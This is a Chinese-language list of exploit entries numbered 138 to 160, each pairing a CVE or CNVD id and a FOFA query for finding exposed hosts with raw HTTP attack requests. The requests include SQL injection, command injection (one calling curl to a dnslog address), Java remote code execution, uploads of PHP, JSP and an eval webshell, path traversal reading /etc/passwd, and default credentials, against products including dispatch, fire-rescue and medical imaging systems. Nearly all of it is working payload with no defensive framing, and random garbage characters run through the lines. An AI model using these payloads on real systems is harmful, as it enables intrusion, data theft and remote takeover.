$ G0 P9 x- {- o% _; e! M9 O; H# tCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj& N, l. K  _/ \. h8 q0 W/ [
Upgrade-Insecure-Requests: 1
- E# q- }5 K3 `$ l# b5 b0 H2 E- q
+ N' p- V4 U! i6 d
/ u. Q. I4 p. @: L138. 福建科立讯通信指挥调度平台pwd_update.php sql注入9 |. q  i3 V( B
CVE-2024-2621
% c' v; G+ \7 I+ ^FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"! m) d: i  A0 e5 [% |
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.11 O+ Q; W  T8 B8 @' W! I
Host: x.x.x.x/ K7 ~, g$ A3 y/ J3 W$ }! m+ h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
+ _& v# M% H3 e" Q* e! Q( f8 W* {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  o- h9 D  N* Q( P0 G
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 D7 F) H1 P. n, l* |Accept-Encoding: gzip, deflate, br3 P' P' L1 G& w/ \1 _
Connection: close
5 Q. D2 H" Z( w# CUpgrade-Insecure-Requests: 15 I& I% _; z7 s8 L+ j  F" w
* V4 \# E0 a) C  @; \- X3 c) w
) P+ k. G0 g% n% f
139. 福建科立讯通信指挥调度平台editemedia.php sql注入$ f1 V5 d( p8 b; y& R
CVE-2024-2622! d" m* O! Q3 s
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
* E5 E. a9 i6 M# mGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
: r$ n+ B& Q+ ?% W' e9 NHost: x.x.x.x$ [; m3 f( T7 G" l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0/ h/ d$ H% |0 ^; F, b6 Y4 ^
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.84 d6 V6 C5 p- F* l- B% J
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 R7 w; c5 S2 D  a! V- O
Accept-Encoding: gzip, deflate, br# V' V1 r0 c  Z5 Z  A
Connection: close: m+ {5 f0 ~" K% d
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
4 I0 r0 v* {: Y3 X, j2 }2 AUpgrade-Insecure-Requests: 18 o6 m: S# t$ M* [/ }' H  H/ T
0 H- d* J/ s, t/ U5 X
# x; g" B' b/ Y& ]& W2 T9 H
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入5 Y# a+ R8 G4 [4 N
CVE-2024-2566  X/ ~" |% Q; c
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
0 M" W; {! r% ~1 y' N  u6 dGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1) ~( a' D( W$ ]1 \, S/ h! H& r# C
Host: x.x.x.x6 t- a% m, _6 z8 O; q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
  Z; s" ?/ D6 B4 ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( |+ y$ f0 ?( L* n5 h( a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2+ q/ t) d5 v3 k
Accept-Encoding: gzip, deflate, br" S0 y' v+ j  }9 J- X
Connection: close) {. J/ q2 G# i" n0 x) \$ [
Cookie: authcode=h8g9
  J; a. I0 h" O1 `% JUpgrade-Insecure-Requests: 1/ i  K3 b2 E# O- O  L! [& t$ {# K
% t" V! s# j! |8 B

0 S) ^6 L# G4 h9 C: e8 \8 }141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入1 V# r; g2 |4 y7 S7 U+ D. V! V( E5 w  C
FOFA:body="指挥调度管理平台", _7 P& B+ q/ K$ P& t$ R
POST /app/ext/ajax_users.php HTTP/1.1# \- ~' P, R4 f8 b8 y
Host: your-ip
2 \' ]9 Q4 n. h& rUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info1 K2 ~6 I6 B: H7 x# d; o
Content-Type: application/x-www-form-urlencoded
2 O7 t5 \' V/ x' O- f- t0 T) c) t6 `
- ~- Z! K8 r! E& q: O" Q/ o+ k9 B" g5 j6 e9 ~, o
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -$ x" D6 ^9 [! x5 X

; R8 J/ c; d4 i" d' r+ v5 ]8 S0 F& j; K
142. CMSV6车辆监控平台系统中存在弱密码
6 t. V1 u# j" _) G) }9 m- gCVE-2024-29666
* D" o, u; [8 f8 c7 dFOFA:body="/808gps/"
; Z! q" J/ m; b: y4 nadmin/admin* M/ ~3 k2 Q, ?- q% o2 b9 P: Q
143. Netis WF2780 v2.1.40144 远程命令执行
) y8 y: j$ P, M- pCVE-2024-25850
5 j* Q% m! V2 y+ F* E$ l. U7 u$ [FOFA:title='AP setup' && header='netis'- G) n- {3 r; W, a& v" ]
PAYLOAD
" _. S9 U6 X, K4 R: i5 u! {  [/ p  E. K$ [. g/ E" w2 I+ E  O9 }
144. D-Link nas_sharing.cgi 命令注入
$ r# I* \! I. r' C% @! UFOFA:app="D_Link-DNS-ShareCenter"
/ w! w. b& u5 Z) N' Qsystem参数用于传要执行的命令3 M1 f5 I6 p) D" A
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
2 [- g# `" \: C0 ~+ x( R5 dHost: x.x.x.x
+ D4 }, G! m3 L' c; [, zUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.02 o* v1 M+ I' F
Connection: close
' Y2 v2 F# @! }( s/ k8 ^1 wAccept: */*$ H% ?( t) s% G  b* ?6 D
Accept-Language: en
* h7 ~' X% z' [Accept-Encoding: gzip
# C7 z1 X' F$ ]+ M( r1 }" v; X; V% A  l# R7 ]
9 S5 F2 k- r/ r
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
# ]9 j8 a( w3 t+ D2 d$ cCVE-2024-3400
1 ?3 ?1 {  {' {FOFA:icon_hash="-631559155"
. f/ F! D( p% z5 W7 hGET /global-protect/login.esp HTTP/1.1/ H4 g- l- _2 c3 P7 q* |* C3 i
Host: 192.168.30.112:1005  |" T! r  c0 V2 [: R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
( [& R" F! H& @7 \; M$ S% `+ `Connection: close$ M0 ^/ Y3 b2 ]6 U5 x
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
1 t1 y9 l/ ]& R  T9 FAccept-Encoding: gzip: N1 M% o4 ?+ ?0 @2 b
0 X( P' d7 k; X! @8 |
+ h! L1 p+ q6 ]# E) @
146. MajorDoMo thumb.php 未授权远程代码执行  I$ C/ W5 u' A' O, j
CNVD-2024-021755 G* s0 m' U4 O1 [1 b4 X
FOFA:app="MajordomoSL"/ q* Y- R3 S  g) _$ @8 ]
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
3 ?: s" W/ b7 X* g5 |* zHost: x.x.x.x% T: U7 l. R, W% e4 s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
; N. F0 O. f4 Q, eAccept-Charset: utf-8  D0 \' ~) Q) C, T( h
Accept-Encoding: gzip, deflate6 c4 f; u# p4 C! W
Connection: close; `1 }- \' }. t0 t* g: L) U
) |: r* D3 O3 Y9 U5 B, [( Z

" k$ U7 _+ I- J, ~147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
# S/ V5 d' x' V  I0 DCVE-2024-32399
0 }4 P! Y+ l7 y  pFOFA:body="RaidenMAILD"7 S" ^4 c7 N" j( b  C
GET /webeditor/../../../windows/win.ini HTTP/1.1& S& ~, ~1 j% |$ R0 A3 n
Host: 127.0.0.1:81
0 P2 I: }, ]( W/ ^) UCache-Control: max-age=04 _6 ~- T$ j" ]% _* s
Connection: close5 y4 ~/ }( ?' ?/ `
# F1 b  q: t# w3 b3 P

# w- L+ b9 V, Q! \0 W9 @* s8 A' U148. CrushFTP 认证绕过模板注入; L9 @* q3 h; ?; w7 J# s
CVE-2024-4040
* N& p- r  o6 u1 S1 S1 B9 U# T6 XFOFA:body="CrushFTP"  _5 p0 v+ B* f7 d- L+ r! ^
PAYLOAD2 s. r& ~9 f3 E: Y: i
9 w+ S* T" u8 A8 D2 j
149. AJ-Report开源数据大屏存在远程命令执行7 B2 c; o; p! D! _) K% C& e- U
FOFA:title="AJ-Report"
* \6 M8 @; q* g' E
9 A8 N" L; p6 h8 @3 KPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' j/ F7 o6 @+ u6 b: FHost: x.x.x.x3 B  z- R3 c* J& q6 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
) X4 n/ w. \- y3 W0 dAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7. A8 o- ?& t' ?
Accept-Encoding: gzip, deflate, br
6 g" c- v' j' S! [& d* dAccept-Language: zh-CN,zh;q=0.9/ j4 }- ?. m# p
Content-Type: application/json;charset=UTF-8. z0 h: x4 X; L1 e: Q+ b4 o
Connection: close
9 ~7 {  ~- i3 m4 u1 P8 C$ M! o! r8 i
. y1 N2 t& f" `{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
) I2 R/ V; j9 R2 ]
( _: X( d/ S) j1 c* V9 H150. AJ-Report 1.4.0 认证绕过与远程代码执行
9 c0 q7 @+ I: bFOFA:title="AJ-Report"$ A% e: L! A5 v
POST /dataSetParam/verification;swagger-ui/ HTTP/1.12 j; ~; P" i7 s: L. L, j) K
Host: x.x.x.x
) J9 F, p2 |. JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.366 ?/ |9 T( F$ e, D$ w- v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 S" e# t" ?- c1 Y
Accept-Encoding: gzip, deflate, br: Y: a- i- v! f4 o) i! k1 M6 f
Accept-Language: zh-CN,zh;q=0.9* W% B5 H' E, Y6 A" i* V$ g" ]) [
Content-Type: application/json;charset=UTF-8
& F' F2 x0 e4 \2 O/ l% DConnection: close
& y* A6 {, |- \Content-Length: 3390 d6 I. s0 _7 W

8 I8 q0 O" R$ z9 g. K{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}6 L3 O1 S2 ?( V" H3 M
" R8 J% g# h) f7 @. K

- z+ a" [- a5 Q, Q151. AJ-Report 1.4.1 pageList sql注入2 n& y+ S( I1 p$ N
FOFA:title="AJ-Report"4 D' U- S9 g4 N) }0 R7 J% y
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
1 q  C6 H4 [+ Y3 q' _- l2 e% DHost: x.x.x.x2 [2 P) Z- n: d6 Y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 l* u% C/ F6 w) M6 I6 A
Connection: close
* i, P* x* ~4 _7 T" ZAccept-Encoding: gzip
: k7 [; ]% t1 x; A/ _  s$ ]' a
& A( a# ?- F+ `: @1 g* F0 D# E/ I- b" _5 x4 u. C
152. Progress Kemp LoadMaster 远程命令执行  U" }6 D. K- i. ~! g+ u
CVE-2024-1212
2 c! u3 p: n, `; t5 {# e' L2 aLoadMaster <= 7.2.59.2 (GA)
+ k7 m9 A# ^, J+ j: x% ALoadMaster<=7.2.54.8 (LTSF). |, D' ^0 ?5 ~! _4 v
LoadMaster <= 7.2.48.10 (LTS)
- [' k. e* p" o# C' I4 H! g7 H. c0 }FOFA:body="LoadMaster"  L# z& s( [+ h$ j, O
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码6 \. ~$ J6 A* q  ~* t& W1 W  [
GET /access/set?param=enableapi&value=1 HTTP/1.1$ V! g2 X* ]: Q! r
Host: x.x.x.x
9 E4 |$ Q* c2 u/ D8 U9 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
- ?9 g9 {7 G! uConnection: close/ G4 e1 m! o- T4 a/ c  _2 `' ~
Accept: */*: S) a; W- k4 k# V# l
Accept-Language: en; }. d0 R2 Q0 ^$ f
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=# M$ V7 _# s% Q- c
Accept-Encoding: gzip
# ^; z) |  f! u' r
' B' Y) B0 ~4 P
( q) H- u! j( N4 K153. gradio任意文件读取$ I$ C( O& z% T: f; ~, l$ N
CVE-2024-1561FOFA:body="__gradio_mode__"; W8 d) H2 q. u  R) ~
第一步,请求/config文件获取componets的id* ?3 f) ]8 Q4 C; t
http://x.x.x.x/config; ^- P0 ^/ ?) u/ q% g" Y9 Q6 ?

: z% c- x$ b/ {$ l6 g
% o: o6 P3 @0 g2 R; [- _第二步,将/etc/passwd的内容写入到一个临时文件
: N& N* i# J5 B1 ~. Q, CPOST /component_server HTTP/1.18 z# l+ Q8 b& w$ J
Host: x.x.x.x
5 `1 y: v+ G$ y3 \  T$ V- I/ Q% M5 }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3& X2 l: |2 R& Y4 Y% O/ H
Connection: close2 M. E) y% R* }5 L" g
Content-Length: 115
1 @% k5 w0 _8 S7 u* KContent-Type: application/json; J3 O! _# B2 G" e
Accept-Encoding: gzip1 r; g# p$ i8 W, u6 b6 d

3 U/ ]7 k& |* k. K: F0 F: D{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
: t1 r1 `! O! c1 a+ U% }1 `7 z! R# G* Q' A- ]" s- Q
4 v8 q1 |2 q2 R6 B( e& G7 _3 |/ R
第三步访问& t# j: ?% a6 `- o0 h- _
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd0 e  a& T. `! X. w* e) v+ O; W" n
7 y- _! S! B' a6 M
1 i* |0 h5 f8 e$ r9 [7 |0 |; K
154. 天维尔消防救援作战调度平台 SQL注入3 [& R/ W4 ^9 a, Z
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入"5 f8 n+ \, X( g2 x) m
POST /twms-service-mfs/mfsNotice/page HTTP/1.1  [" y$ d! w( [' b0 u
Host: x.x.x.x2 P  p9 u# S8 |0 i3 V
Content-Length: 106
# r; |* K$ N  [$ W* P/ i; qCache-Control: max-age=0
5 V: ]1 E7 D' ^  m$ ]* g: eUpgrade-Insecure-Requests: 1- b/ h% k: E9 E: w- w- H' z6 X
Origin: http://x.x.x.x
/ {5 m  c: d4 F* F, \Content-Type: application/json" `  h+ B3 n. u4 }. D* B
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
: `$ E" E; h! K1 @9 FAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ U+ k9 v: @! U( I$ {$ H8 k( |Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page2 i' s0 \. h6 T( g9 p8 g6 ^8 X/ I4 n
Accept-Encoding: gzip, deflate, d/ h) y. F  w* ^8 @' Q
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
/ S0 o, X3 C# q* QConnection: close
% y9 [2 B2 I3 t" H3 Q8 ^( ^2 A5 `$ M  t/ o9 C/ }- X$ f
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}
3 I$ I1 C' c- y' l" I6 u4 H  h! Q- k- u" |; z5 `' U# ]( O- o0 d# w

; F: }$ p9 e; o3 U0 b( R/ B$ A155. 六零导航页 file.php 任意文件上传! g- u  S  \* e& d0 }" Z# x" x
CVE-2024-34982
! G; F* g( x& dFOFA:title=="上网导航 - LyLme Spage"3 D; p  m  j$ ~) J7 ^" h4 T
POST /include/file.php HTTP/1.17 N; ~3 g0 i* G+ e7 S' j+ j' O/ g: H
Host: x.x.x.x
( K0 p! N! Y$ F2 VUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
: t2 |1 l1 g+ R- R3 E7 {+ {Connection: close- T7 N$ q* O8 \8 X! U
Content-Length: 232
9 h7 @/ F* h" \/ A- k3 [- z% f, _Accept: application/json, text/javascript, */*; q=0.01
2 l$ X. e/ p5 F) DAccept-Encoding: gzip, deflate, br! m1 S+ B! ^1 o, a- I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.21 D& \; ^5 W) w
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f) m4 Z* j& D' p& V9 b
X-Requested-With: XMLHttpRequest
8 _" s: M9 o/ e/ ]7 p* L8 ~( r7 P, L) |+ }% n0 `$ C) J
-----------------------------qttl7vemrsold314zg0f- \: S$ k; X* G& I
Content-Disposition: form-data; name="file"; filename="test.php"
' s7 k; S1 B; Q% ?* BContent-Type: image/png
- h4 o0 T/ J" I. O1 q+ x7 c. i; W
/ L4 P. e) n( Y% G4 O<?php phpinfo();unlink(__FILE__);?>
. Y- m/ L: d* n* d. r- [-----------------------------qttl7vemrsold314zg0f--
: x: L9 A! W  S7 p) n# B7 y1 M1 \0 ~0 P: s
6 h, d1 ^# j9 O* _0 m( i9 t; N
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
8 q: x' Y5 q3 u6 R0 f# F- w7 c* C. B/ C: G3 C( s$ x
156. TBK DVR-4104/DVR-4216 操作系统命令注入; d: N3 k2 n' j$ O, Q
CVE-2024-3721, w9 {6 ]  d: }# v3 d' Z5 s
FOFA:"Location: /login.rsp"
6 {9 I; t: J1 n4 Q·TBK DVR-4104
5 ]) S! _, ]$ H# Q1 p2 J6 y·TBK DVR-4216
0 ~; F/ t! c3 p0 _% \curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1": ~- E" I  H# _1 P8 x2 e+ \
* F+ t$ a$ i0 G- f: D$ ^' M
5 A8 G8 M0 k, L. x# U7 w; D
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.19 I$ `( u6 V5 a9 ?
Host: x.x.x.x1 x. D: z: x0 m# Z; n+ A& a; c
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 P2 \4 _  q% `% ]7 X& h
Connection: close
4 P) l: [' a6 w2 D- P- }. t5 TContent-Length: 03 o& Q( ~: D" Z' r
Cookie: uid=1
! u" E2 F9 I* r; `Accept-Encoding: gzip9 G% G) [: w7 }, I6 e
- `1 {" l. ], l# |

8 `7 Y) v- G* x) A2 B& {157. 美特CRM upload.jsp 任意文件上传# l  }) l2 z" y- C! {
CNVD-2023-06971
) L& I4 b& A( bFOFA:body="/common/scripts/basic.js"; e+ _3 W% C' P  B  `5 i; ?
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.12 n9 l  r9 _, w
Host: x.x.x.x
! n2 h. e( V: @6 x( @# }8 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36% H! [/ k( B% `# L' M. X
Content-Length: 709
# B8 G* j7 d% h9 d2 L, m+ IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 B3 Z" w1 f1 b6 d& N  `
Accept-Encoding: gzip, deflate
0 F9 p/ r) y  {6 R6 gAccept-Language: zh-CN,zh;q=0.93 {/ |8 R; d( e  \* Q
Cache-Control: max-age=05 q* h% m) k0 C- I- O! A8 z
Connection: close7 e. j: T# F' C8 |6 n7 U6 I8 B
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
$ _2 z' D) j, l5 z) n1 u# aUpgrade-Insecure-Requests: 1
: D  b( R2 K1 R* K& J" B' z! J6 G1 `( r; k  d0 o
------WebKitFormBoundary1imovELzPsfzp5dN
' e, ~% y  B; J$ }" e& TContent-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
* k6 P! r4 n7 C$ P) t4 FContent-Type: application/octet-stream! o5 G1 X# w3 \4 D$ k
- b  f% r* c3 K* w
nyhelxrutzwhrsvsrafb; W6 f* {/ X: X2 `; ~0 z) s/ `
------WebKitFormBoundary1imovELzPsfzp5dN) m( x3 F7 I' D! z1 o/ a- Q: @) |" ^
Content-Disposition: form-data; name="key"
1 m, [5 H1 v' I  V2 m
' r  f$ x. s, R4 _# Fnull
: m  {1 j0 K4 X6 P6 s------WebKitFormBoundary1imovELzPsfzp5dN
6 C( t0 c% f& B+ w2 I) o/ H) Y& IContent-Disposition: form-data; name="form"
; @  P, t  j% P2 X) e  m" q4 x4 p. A1 h" B5 y: z3 v8 x' G
null
3 \: {  P5 v. h5 V------WebKitFormBoundary1imovELzPsfzp5dN9 _! V4 W  u: Z& g
Content-Disposition: form-data; name="field"% M2 |9 d  a, k7 w
% s. r9 R" i! J$ b: q3 ^0 O
null
$ s6 H$ P; s9 V& @# U7 A0 h------WebKitFormBoundary1imovELzPsfzp5dN
/ d! B  y) R2 t  s- Z: ?0 m( S9 UContent-Disposition: form-data; name="filetitile") f0 Q& o6 f- p9 g

: |# n0 e# ?+ c2 e2 Rnull
) u9 i+ t6 C2 ]% j0 Q; g------WebKitFormBoundary1imovELzPsfzp5dN
1 v1 E' H+ W/ h) IContent-Disposition: form-data; name="filefolder"* I* m4 M& [: T" e

7 Q# O! J3 }- v" U0 G& Znull
) n5 o) b) G( N------WebKitFormBoundary1imovELzPsfzp5dN--
. k% `7 G9 y0 }% M' J6 K7 z! [
7 q1 D4 Y' ^6 [' Q- w8 |/ n0 O% I' Y3 \, q$ D" d
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
: ?- @3 p/ }! {/ x8 k+ z
5 N, `9 ~; ?8 v) O158. Mura-CMS-processAsyncObject存在SQL注入
4 t' F8 p6 N+ f# R0 n1 A) D5 uCVE-2024-326409 `2 k6 x( A0 S* F* {- r
FOFA:"Generator: Masa CMS"
* g. m+ I* k: L( \" W4 r) uPOST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1/ D. y! Z- U" X2 I$ l6 d; I
Host: {{Hostname}}
4 f9 E* i8 |9 Z1 V% i9 f% PContent-Type: application/x-www-form-urlencoded' T  E# P6 R) x3 h

- K/ |5 |7 r* {- j, J' Oobject=displayregion&contenthistid=x\'&previewid=1* M2 K5 P9 C$ h1 U$ u& g% q

0 T) R/ `& U) T) t( m4 t5 e8 h4 t6 o
159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
7 ^. g+ R8 m) S" `4 BFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
9 z" \( Q" g  s4 hPOST /webservices/WebJobUpload.asmx HTTP/1.1
3 O  \: o6 d" c1 r0 E1 CHost: x.x.x.x( r, u0 d7 Z: p4 }2 D- {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.369 y4 a, R2 r% j( g
Content-Length: 1080
$ d+ V2 x: c/ h* D" \6 ~Accept-Encoding: gzip, deflate: @, h# _' @# n( F8 h
Connection: close, D1 }8 W. J6 ?; V* {& r
Content-Type: text/xml; charset=utf-8
) x3 U$ S  n" }3 h. U9 T! dSoapaction: "http://rainier/jobUpload"
3 u6 X, P7 P, w  G8 x1 g( \+ G( Z; [, c+ R3 y
<?xml version="1.0" encoding="utf-8"?>, _* R4 i9 ]" `
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">6 i/ z5 p. r# P& {1 ~! |
<soap:Body>
& m( j' s* w4 w9 I+ B" a/ D<jobUpload xmlns="http://rainier">( u- o  K$ ]. V& ~( p, r
<vcode>1</vcode>
0 f$ x* u- b, N" e; ]<subFolder></subFolder>
* X1 |8 N6 v4 X# D( q1 m5 m/ G1 H<fileName>abcrce.asmx</fileName>
( _7 F! T# J: q, V% w: }* o<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>" P; a/ o- `& G3 k5 O' U
</jobUpload>% u! X* C% f' ]& N, S2 T; t
</soap:Body>
0 y/ `2 C4 e9 w6 ^+ E9 G5 {</soap:Envelope>7 O# n1 [: o- o7 s5 b

# a" p2 O. z7 L+ z% r0 e, l# m7 z
% D* v# G. |& W9 C9 {  c* P/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")
4 F1 i; W9 O  w- p, y1 T/ \
5 v& m, |# ?3 a6 {" b1 i0 l+ w" c/ I9 Z
160. Sonatype Nexus Repository 3目录遍历与文件读取5 a8 R0 R3 _) ~- w" I
CVE-2024-4956
3 z5 \3 q; L9 O: |8 y8 a2 y. ?5 f  `7 VFOFA:title="Nexus Repository Manager"
1 t" R8 Y9 p& {. x+ f; M! M( I! vGET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
0 U' L: v: E7 g- @$ c  x) |+ ^Host: x.x.x.x8 ^: |7 R6 b% `8 {; A1 A
